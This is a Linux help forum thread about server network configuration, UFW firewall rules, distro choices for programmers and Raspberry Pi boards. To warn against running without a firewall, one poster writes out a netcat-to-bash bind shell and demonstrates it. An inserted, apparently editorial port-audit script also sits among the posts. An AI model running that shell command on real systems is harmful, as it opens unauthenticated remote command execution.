• General Linux Chat and Small Questions v. Year of the Linux Desktop!
    4,886 replies, posted
[QUOTE=Anderen2;50717062]Are you running a Webserver on the same server as you now want to configure Postfix on? If so, that does not change much, you could (and should) still route the traffic through the firewall and port forward/open the necessary ports. Running a server (no matter what platform) with no firewall directly on a external line is very bad practice.[/QUOTE] yes. there's already a website running under the firewall. it's not running any services open to the outside, i've port scanned it
[QUOTE=Giraffen93;50717077]yes. there's already a website running under the firewall. it's not running any services open to the outside, i've port scanned it[/QUOTE] That's due to there being no other services running. If there is no firewall in front then you are very vulnerable towards zero-day attacks, malware, and other funny stuff. Try running (really, don't) [code]nc -l *enter external IP here* 1337 | /bin/bash[/code] Also, it's saying it's not configured right, or the configuration has changed since you brought the interface up. Try: [code]sudo ip link set eth2 down[/code]
by the way i know for a fact that windows can do this, as one of our other servers has both an internal ip address and an external one and it's working just fine [QUOTE=Anderen2;50717111]That's due to there being no other services running. If there is no firewall in front then you are very vulnerable towards zero-day attacks, malware, and other funny stuff. Try running (really, don't) [code]nc -l *enter external IP here* 1337 | /bin/bash[/code] Also, it's saying its not configured right, or the configuration has changed since you brought the interface up. Try: [code]sudo ip link set eth2 down[/code][/QUOTE] i'll look into software firewalling, but i'm not sure i'm gonna get anywhere isn't ifdown the same thing? is it a second layer thing? that worked, but it's still in the list, guess that's good enough?
[QUOTE=Giraffen93;50717139]by the way i know for a fact that windows can do this, as one of our other servers has both an internal ip address and an external one and it's working just fine isn't ifdown the same thing? is it a second layer thing? that worked, but it's still in the list, guess that's good enough?[/QUOTE] Every OS may have lots of NIC's in several different networks, the key word here is different. If the network configuration has two NIC's pointed to the same network, well then I do not know what happens, likely it just does not work. How is your config looking now by the way? Could you add the gateway line back to eth1, and then run "ifdown eth1 && ifup eth1"? Also, please post the output of the commands I listed at the previous page again afterwards (You could leave out the output for ip link, it was not that exciting).
[img]http://rp.braxnet.org/scr/146862042772592.png[/img] fun times, even did the ip link set down thing the "file exists" error is extra hilarious due to how useless it is
[QUOTE=Giraffen93;50717204][img]http://rp.braxnet.org/scr/146862042772592.png[/img] fun times, even did the ip link set down thing the "file exists" error is extra hilarious due to how useless it is[/QUOTE] Haha, I cannot disagree there. It has to do with how everything in Linux is a file, and I guess what it's trying to tell you is that the connection to the network is already established. I would guess that some kind of conflict occurred when you had both of the NICs on the same network with the gateway. It's night now in Sweden, and if your site is not required to serve 24/7 then I would recommend you to do a quick maintenance window by fixing the network configuration and then rebooting the server to wipe away any bogus network state. Just remove all references to eth2 (or at least the ipaddress, netmask and gateway), set eth0 and eth1 up properly, and post the config here before rebooting. If rebooting is out of the option, then fixing it is not impossible, it would probably just take time to figure out what kind of state which is bogus over a forum.
[QUOTE=Anderen2;50717272]Haha, I cannot disagree there. It has to do with how everything in Linux is a file, and I guess what it's trying to tell you is that the connection to the network is already established. I would guess that some kind of conflict occurred when you had both of the NIC's on the same network with the gateway. It's night now in Sweden, and if your site is not required to serve 24/7 then I would recommend you to do a quick maintenance window by fixing the network configuration and then rebooting the server to wipe away any bogus network state. Just remove all references to eth2 (or atleast the ipaddress, netmask and gateway), set eth0 and eth1 up properly, and post the config here before rebooting. If rebooting is out of the option, then fixing it is not impossible, it would probably just take time to figure out what kind of state which is bogus over a forum.[/QUOTE] i'm not gonna risk rebooting it and having it offline until on monday when i get there, that's gonna have to happen then eth0 [I]needs[/I] to stay up, or eth1 if i can bother connecting to the vpn on the other server
[QUOTE=Giraffen93;50717300]i'm not gonna risk rebooting it and having it offline until on monday when i get there, that's gonna have to happen then eth0 [I]needs[/I] to stay up, or eth1 if i can bother connecting to the vpn on the other server[/QUOTE] I understand, however if this server is mission critical then I would advise that we'd stop messing with it until you are able to fix it on-site, in case something breaks, reboot or not. I would recommend that you'd look into enabling and configuring ILO or iDRAC in the future (assuming that this is running on server hardware), such that you may fix stuff while not on site. Also, as far as I can see (assuming that the network settings are correct), then fixing the config, removing eth2 and rebooting should make it work. Final remark, please look into getting the server behind a firewall. Too many servers have been sieged while in a setup like yours due to reasons mentioned. At least if the mails going through it, and the web traffic could contain sensitive information.
[QUOTE=Anderen2;50717346]I understand, however if this server is mission critical then I would advise that we'd stop messing with it until you are able to fix it on-site, in-case something breaks, reboot or not. I would recommend that you'd look into enabling and configuring ILO or iDRAC in the future (assuming that this is running on server hardware), such that you may fix stuff while not on site. Also, as far as I can see (assuming that the network settings are correct), then fixing the config, removing eth2 and rebooting should make it work. Final remark, please look into getting the server behind a firewall. Too many servers has been sieged while in a setup like yours due to reasons mentioned. Atleast if the mails going through it, and the web traffic could contain sensitive information.[/QUOTE] we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school) so looking up how to block everything but port 22, 80 and 443 then? still, there's nothing else running, i don't see how blocking would help
what kind of company has a budget of less than $100 furthermore who let you have administrative access to the company server [editline]15th July 2016[/editline] [QUOTE=Giraffen93;50717414]we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school)[/QUOTE] ah
[QUOTE=Dr. Evilcop;50717424]what kind of company has a budget of less than $100 furthermore who let you have administrative access to the company server[/QUOTE] priorities. and our large ups broke yesterday too so that needs replacing, it's all these small costs i've got contacts, and you gotta start somewhere right? nobody is born with all the knowledge
[QUOTE=Giraffen93;50717414]we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school) so looking up how to block everything but port 22, 80 and 443 then? still, there's nothing else running, i don't see how blocking would help[/QUOTE] Firewall is not there to block services running there already (Windows is an exception), it's there to ensure that no new and unwanted ones suddenly start working. You said that the server ran a webserver, I'm assuming that this may run some kind of dynamic content? (and even if it does not then zero-days pop up all the time) Also, I guess that you do not code-review all the software that gets installed on the server? If one of the statements above are true, then you should use a firewall. Say someone does something stupid on your network, and the server gets infected. Instead of containing the infection there, attackers may get additional access simply by making the malware execute the simple line I posted earlier (Or tons of even more fun lines). Case in point:
[code]
Personal computer
anderen2@e7440:~$ cd /tmp
anderen2@e7440:/tmp$ echo "Hello world!" > importantfile
anderen2@e7440:/tmp$ ls importantfile
importantfile
anderen2@e7440:/tmp$ cat importantfile
Hello world!
anderen2@e7440:/tmp$ nc -l 192.168.0.11 1337 | /bin/bash
^C
anderen2@e7440:/tmp$ cat importantfile
Woops

Other computer (Note that there were no questions for username/password, I simply knew the IP address and that it was vulnerable)
anderen2@proliant01:~$ nc 192.168.0.11 1337
echo "Woops" > /tmp/importantfile
[/code]
[editline]16th July 2016[/editline]
[QUOTE=Giraffen93;50717492]priorities. and our large ups broke yesterday too so that needs replacing, it's all these small costs i've got contacts, and you gotta start somewhere right? nobody is born with all the knowledge[/QUOTE] No shame in starting small, we've all been there :)
Just great. Now im getting read error when i boot to ubuntu. How do i fix it?
[QUOTE=EddieLTU;50720827]Just great. Now im getting read error when i boot to ubuntu. How do i fix it?[/QUOTE] You really need to start being more descriptive :v: What read error, exactly?
[QUOTE=Giraffen93;50717414]we have no real server hardware anywhere, wouldn't be able to afford it :v: (this is a non-profit school) so looking up how to block everything but port 22, 80 and 443 then? still, there's nothing else running, i don't see how blocking would help[/QUOTE] UFW would be a good first step. It's built right into Ubuntu and is incredibly easy to use.
[code]
# default policy: drop inbound traffic that no rule allows
ufw default deny incoming
ufw allow ssh
ufw allow http
ufw allow https
ufw allow 53
ufw enable
[/code]
You could even restrict by IP.
[code]
# allow SSH (port 22) only from this source range
ufw allow from 129.221.0.0/16 to any port 22
[/code]
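The firewall argument in the posts above comes down to catching listeners that were never meant to exist. As an added example (not code from any poster in this thread), this script reads `ss -Htln` output and reports every network-reachable TCP listener outside an allowlist; the allowlist of 22, 80 and 443 and the sample lines are assumptions constructed from the ports and addresses mentioned in the thread.

```shell
# Added example: flag TCP listeners that are outside an allowlist.
# Input: lines as printed by `ss -Htln`
#   (State Recv-Q Send-Q Local-Address:Port Peer-Address:Port)

ALLOWED_PORTS="22 80 443"   # assumption: the ports named in the thread

# Reads ss -Htln style lines on stdin and prints "address port" for each
# listener that other hosts can reach and whose port is not allowlisted.
unexpected_listeners() {
    awk -v allowed="$ALLOWED_PORTS" '
        BEGIN {
            n = split(allowed, a, " ")
            for (i = 1; i <= n; i++) ok[a[i]] = 1
        }
        $1 == "LISTEN" {
            la = $4
            # Port is the text after the last colon (0.0.0.0:80, [::]:80, *:80).
            port = la
            sub(/^.*:/, "", port)
            addr = substr(la, 1, length(la) - length(port) - 1)
            # Loopback-only sockets are not reachable from the network.
            if (addr ~ /^127\./ || addr == "[::1]") next
            if (!(port in ok)) print addr, port
        }'
}

# Constructed sample: a web server, sshd, a loopback-only mail daemon and
# the netcat listener from the demonstration earlier in the thread.
SAMPLE='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 511 [::]:443 [::]:*
LISTEN 0 100 127.0.0.1:25 0.0.0.0:*
LISTEN 0 1 192.168.0.11:1337 0.0.0.0:*'

# Runs the check over the constructed sample.
audit_sample() {
    printf '%s\n' "$SAMPLE" | unexpected_listeners
}

# On a live host: ss -Htln | unexpected_listeners
audit_sample
```

An external port scan taken once only shows the listeners that existed at that moment; running a check like this on a schedule shows new ones as they appear, and a default-deny inbound policy keeps them unreachable in the meantime.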
[QUOTE=Dr. Evilcop;50720864]You really need to start being more descriptive :v: What read error, exactly?[/QUOTE] nevermind, i broke the heat sink for that pc, so i aint booting in for a long time
So I'm a complete novice to Linux but I'm a software developer who's been using C and C++ for over a decade. I want to get into developing on Linux and getting a good understanding for using it as a desktop OS on my laptop - this means I want to learn a load of Linux stuff, but I also want to actually be able to do shit without spending hours troubleshooting everything I want to do. So given that, what distro would you recommend? I had a look on the Ubuntu site and they're pushing all this crap about cloud stuff which doesn't appeal to me at all. edit: I'm currently leaning towards Mint, my only reservation is whether it might be a bit too easy and stop me from learning so much?
[QUOTE=Jallen;50722432]So I'm a complete novice to Linux but I'm a software developer who's been using C and C++ for over a decade. I want to get into developing on Linux and getting a good understanding for using it as a desktop OS on my laptop - this means I want to learn a load of Linux stuff, but I also want to actually be able to do shit without spending hours troubleshooting everything I want to do. So given that, what distro would you recommend? I had a look on the Ubuntu site and they're pushing all this crap about cloud stuff which doesn't appeal to me at all. edit: I'm currently leaning towards Mint, my only reservation is whether it might be a bit too easy and stop me from learning so much?[/QUOTE] In my experience Arch Linux is way better for programming than any of the Ubuntu-based distros. My suggestion would be to do an Arch virtual machine. You'll have minimal troubleshooting to do since it's pretty well documented how to setup Arch for VirtualBox, and you'll get the full benefits of that sweet sweet Pacman. Once you've learned a bunch about Linux, you could consider dual booting with Arch.
I was considering Arch but I initially shied away from it as I got the impression that I would be swamped with too much stuff I don't understand. Maybe I should get a book or something, I'm going in really quite blind.
[QUOTE=Jallen;50722588]I was considering Arch but I initially shied away from it as I got the impression that I would be swamped with too much stuff I don't understand. Maybe I should get a book or something, I'm going in really quite blind.[/QUOTE] No need for a book, the Arch wiki is very thorough and very accessible. Check out the [URL="https://wiki.archlinux.org/index.php/beginners'_guide"]beginner's guide[/URL]. Generally people aren't recommended Arch because most people are scared of a command line, but as a programmer I expect you'll be just fine. It's actually not that complicated, and the risk of failure inside a virtual machine is practically nil other than your time. There are Arch-based distros that provide an installer, but installing Arch is a very valuable learning experience that you shouldn't pass up. I wouldn't worry about getting swamped with new knowledge unless you try to install Gentoo instead :v:
[QUOTE=Jallen;50722588]I was considering Arch but I initially shied away from it as I got the impression that I would be swamped with too much stuff I don't understand. Maybe I should get a book or something, I'm going in really quite blind.[/QUOTE] Arch is pretty nice after you push through the installer. Its difficulty afterwards depends entirely on what you wind up doing with it, but the difference between it and say, Ubuntu is that the arch wiki is pretty much the best documentation for any distro I've ever come across, so if you do try to do some advanced things, it's there to help. If you just install say, GNOME and then the stuff you use for programming you won't have those hours of troubleshooting. There's also Debian and Fedora which are pretty approachable distros that don't quite get in your way like Mint or Ubuntu. They have nice installers that get you going (both have full disk encryption, since you have a laptop I hope you use it!)
I dunno if this applies to debian but my problem with Ubuntu and its package manager apt-get is it just doesn't work for half the development libraries I tried to use. E.g. I'd install the developer package for libSDL, then go to link it, but it just didn't work and now I have to go grab it from SDL's website. Furthermore, shit is constantly way outdated in the Ubuntu repos. Arch and pacman/pacaur have been very good to me in that regard.
Fedora is pretty good for being up-to-date, and you can create your own packages if necessary on [URL="https://copr.fedorainfracloud.org/"]COPR[/URL]/[URL="https://build.opensuse.org/"]OBS[/URL]
[QUOTE=Adam.GameDev;50722888]Fedora is pretty good for being up-to-date, and you can create your own packages if necessary on [URL="https://copr.fedorainfracloud.org/"]COPR[/URL]/[URL="https://build.opensuse.org/"]OBS[/URL][/QUOTE] Same deal with Ubuntu and PPA's on Launchpad.
I know I can create my own packages but I don't see why I'd bother since I've gotta go grab the source from SDL's website either way :v: It's nice to have it just ready to go in the official repos/AUR like in Arch.
[QUOTE=Van-man;50722895]Same deal with Ubuntu and PPA's on Launchpad.[/QUOTE] Does Debian have anything similar for itself?
[QUOTE=Adam.GameDev;50722921]Does Debian have anything similar for itself?[/QUOTE] Only unofficial repositories (PPA's are actually easymode installers for Launchpad repositories) Example of such Debian repo 'installing': [url]https://www.dotdeb.org/instructions/[/url]
i got my raspberry pi 3, and it's pretty neat. But the pi 3 is a little weird. It's a 64 bit ARMV8 buuuuuut every distro you download is still 32 bit, because apparently broadcom are kind of cunts? Though, it's still a pretty cool little thing. I got a case, charger, 32GB ld microsd, and heatsinks with it too. 64 bit should be available eventually probably which'll be cool. I think I can get the void musl libc version running on it though, and then I'll be happy, with wayland too! For mainstream distros I think it's mostly debian/ubuntu that have pi images and I can't really stand apt (don't lynch me.) I could also get arch I think.
[QUOTE=thelurker1234;50723827]i got my raspberry pi 3, and it's pretty neat. But the pi 3 is a little weird. It's a 64 bit ARMV8 buuuuuut every distro you download is still 32 bit, because apparently broadcom are kind of cunts? Though, it's still a pretty cool little thing. I got a case, charger, 32GB ld microsd, and heatsinks with it too. 64 bit should be available eventually probably which'll be cool. I think I can get the void musl libc version running on it though, and then I'll be happy, with wayland too! For mainstream distros I think it's mostly debian/ubuntu that have pi images and I can't really stand apt (don't lynch me.) I could also get arch I think.[/QUOTE] IIRC the Raspbian distro is 64 bit. But yeah, the RPi's non-standard CPU and GPU are the bane of my existence. Anything not officially supported takes some ugly hacks to get working, especially when it comes to GPU accelerated stuff. I much prefer the ODROID C2 since it has a faster processor, a much better GPU (which supports 4k), twice the RAM, an MMC port for fast SSD storage, and the processor and gpu are much more generic/standard for what you see in consumer ARM computers, so it's much easier to work with. Android runs very well on the C2 without any hacky bullshit, and you can use hardware acceleration in various browsers rather than just epiphany, for example. It also comes out to roughly the same price, maybe $5 more if you need a wifi adapter for it. The only real problem is it doesn't have the same level of community as the RPi, but I don't think that's a huge issue for what a lot of people buy RPi's for (running emulators, small server tasks like an FTP, being a media center, etc).
[QUOTE=thelurker1234;50723827]i got my raspberry pi 3, and it's pretty neat. But the pi 3 is a little weird. It's a 64 bit ARMV8 buuuuuut every distro you download is still 32 bit, because apparently broadcom are kind of cunts? Though, it's still a pretty cool little thing. I got a case, charger, 32GB ld microsd, and heatsinks with it too. 64 bit should be available eventually probably which'll be cool. I think I can get the void musl libc version running on it though, and then I'll be happy, with wayland too! For mainstream distros I think it's mostly debian/ubuntu that have pi images and I can't really stand apt (don't lynch me.) I could also get arch I think.[/QUOTE] openSUSE Leap has an aarch64 port, but I can't find anything about openSUSE supporting anything newer than the Pi 2